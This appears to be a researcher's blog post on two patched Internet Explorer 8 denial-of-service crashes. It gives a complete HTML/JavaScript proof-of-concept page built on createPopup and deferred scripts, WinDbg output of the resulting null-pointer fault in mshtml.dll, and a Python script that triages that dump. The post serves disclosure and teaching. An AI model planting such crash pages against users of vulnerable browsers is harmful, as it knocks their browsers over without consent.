While testing variations of another bug on IE8, I found two separate crash paths involving window.createPopup() and deferred scripts. Both were straightforward to trigger and required no user interaction.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>IE8_DoS_createPopup</title>
</head>
<body>
<h1>IE8_DoS_createPopup</h1>
<font face="Arial" size="2">
<b>While testing variations of WinOOB #958601 on IE8 [8.0.6001.18405], two interesting DoS found me:</b><br /><br />
<hr />
<script language="JavaScript">
function crash_01()
{
doc = window.createPopup().document;
doc.body.innerHTML='.<SCRIPT DEFER>location.reload();<\/SCRIPT>';
}
function crash_02()
{
cPop = window.createPopup();
cPop2 = cPop.document.parentWindow.createPopup();
cPop2.document.body.innerHTML='.<SCRIPT DEFER>location.reload();<\/SCRIPT>';
cPop2.show(0,0,10,10);
}
</script>
doc = window.createPopup().document;<br />
doc.body.innerHTML='.<SCRIPT DEFER>location.reload();<\/SCRIPT>';<br />
<input type="button" onclick="crash_01()" value="Crash 01">
<br /><br />
<hr />
cPop = window.createPopup();<br />
cPop2 = cPop.document.parentWindow.createPopup();<br /><br />
cPop2.document.body.innerHTML='.<SCRIPT DEFER>location.reload();<\/SCRIPT>';<br />
cPop2.show(0,0,10,10);<br />
<font size="1" color="green">//This crash works only when using the transitional.dtd<br />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"></font><br />
<input type="button" onclick="crash_02()" value="Crash 02">
<br />
</font>
</body>
</html>
The WinDbg output from crash 02 showed an access violation in mshtml.dll at DllCanUnloadNow+0xfc1e, with a null pointer dereference at edi+0x10. The second crash was sensitive to the DOCTYPE — it only occurred with the XHTML Transitional DTD in place. Both crashes were tested on Windows XP SP3 with IE 8.0.6001.18405/18408.
(a78.aa0): Access violation - code c0000005 (first chance)
eax=01edf5b0 ebx=027d32d8 ecx=00000004 edx=00000000 esi=01edf5b0 edi=00000000
eip=637020aa esp=01edf528 ebp=01edf550
mshtml!DllCanUnloadNow+0xfc1e:
637020aa ff7710 push dword ptr [edi+10h] ds:0023:00000010=????????
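As a triage step on the defender's side, and as an added example that is not part of the original post, the following Python script parses the WinDbg excerpt above and recomputes the faulting address from the register dump, confirming the null-pointer reading: edi is 0, so `push dword ptr [edi+10h]` touches address 0x10, which lies in the unmapped null page and makes this a reliable crash rather than an attacker-steered memory access. The regular expressions, the 64 KiB null-page threshold and the `triage` result layout are my own assumptions; the `WINDBG_OUTPUT` sample embedded in the script is the excerpt from this post reproduced verbatim so the script runs offline.

```python
import re

# Constructed sample: the WinDbg excerpt quoted in the post (crash 02), embedded
# here so the script runs offline. A real run would read a saved WinDbg log instead.
WINDBG_OUTPUT = """\
(a78.aa0): Access violation - code c0000005 (first chance)
eax=01edf5b0 ebx=027d32d8 ecx=00000004 edx=00000000 esi=01edf5b0 edi=00000000
eip=637020aa esp=01edf528 ebp=01edf550
mshtml!DllCanUnloadNow+0xfc1e:
637020aa ff7710 push dword ptr [edi+10h] ds:0023:00000010=????????
"""

# 32-bit general-purpose registers as WinDbg prints them: name=8 hex digits
REG_RE = re.compile(r"\b(e(?:[abcd]x|[sd]i|[bs]p|ip))=([0-9a-fA-F]{8})\b")
# Memory operand with one base register and an optional hex displacement
# ([edi+10h], [esi], [eax-4h]); WinDbg marks hex immediates with a trailing 'h'
MEM_RE = re.compile(r"\[(e[a-z]{2})(?:\s*([+-])\s*([0-9a-fA-F]+)h?)?\]")
# The address WinDbg annotates after the instruction, e.g. ds:0023:00000010
FAULT_RE = re.compile(r"ds:[0-9a-fA-F]{4}:([0-9a-fA-F]{8})")
# Symbolised location line, e.g. 'mshtml!DllCanUnloadNow+0xfc1e:'
SYMBOL_RE = re.compile(r"^(\S+!\S+):\s*$", re.M)
# Windows never maps the lowest 64 KiB of user space, so any access below this
# limit is a dereference of a NULL (or near-NULL) pointer plus a fixed offset.
NULL_PAGE_LIMIT = 0x10000


def parse_registers(text):
    """Map register name -> integer value from the 'eax=... ebx=...' lines."""
    return {name: int(val, 16) for name, val in REG_RE.findall(text)}


def faulting_instruction(text, regs):
    """Return the disassembly line whose address equals eip, or None."""
    eip = "%08x" % regs["eip"]
    for line in text.splitlines():
        if line.lower().startswith(eip):
            return line
    return None


def parse_memory_operand(insn):
    """Extract (base_register, signed_displacement) from an instruction line."""
    m = MEM_RE.search(insn)
    if not m:
        return None
    base, sign, disp = m.groups()
    offset = int(disp, 16) if disp else 0
    return base, (-offset if sign == "-" else offset)


def effective_address(regs, operand):
    """Recompute the accessed address from the register dump (32-bit wraparound)."""
    base, offset = operand
    return (regs[base] + offset) & 0xFFFFFFFF


def triage(text):
    """Classify an x86 access violation from a WinDbg first-chance excerpt."""
    regs = parse_registers(text)
    insn = faulting_instruction(text, regs)
    operand = parse_memory_operand(insn) if insn else None
    computed = effective_address(regs, operand) if operand else None
    reported_m = FAULT_RE.search(text)
    reported = int(reported_m.group(1), 16) if reported_m else None
    sym = SYMBOL_RE.search(text)
    result = {
        "symbol": sym.group(1) if sym else None,
        "module": sym.group(1).split("!")[0] if sym else None,
        "base_register": operand[0] if operand else None,
        "base_value": regs.get(operand[0]) if operand else None,
        "computed_address": computed,
        "reported_address": reported,
        # If these disagree, the register dump and the disassembly line do not
        # describe the same machine state and the excerpt should not be trusted.
        "addresses_agree": computed is not None and computed == reported,
        "null_page": computed is not None and computed < NULL_PAGE_LIMIT,
    }
    if result["null_page"]:
        result["verdict"] = ("NULL-pointer dereference at a fixed offset: "
                             "reliable crash (DoS), address not attacker-controlled")
    else:
        result["verdict"] = "fault address outside the null page: needs further analysis"
    return result


if __name__ == "__main__":
    for key, value in triage(WINDBG_OUTPUT).items():
        if isinstance(value, int) and not isinstance(value, bool):
            value = "0x%08x" % value
        print("%-18s %s" % (key + ":", value))
```

Run as-is it prints the parsed fields for the excerpt above (symbol `mshtml!DllCanUnloadNow+0xfc1e`, base register `edi` with value 0, computed and reported address both 0x10, null-page verdict). The `addresses_agree` check is the useful sanity test when triaging logs by hand: if the address recomputed from the registers does not match the one WinDbg annotated, the dump was taken from a different instruction than the one shown.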
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.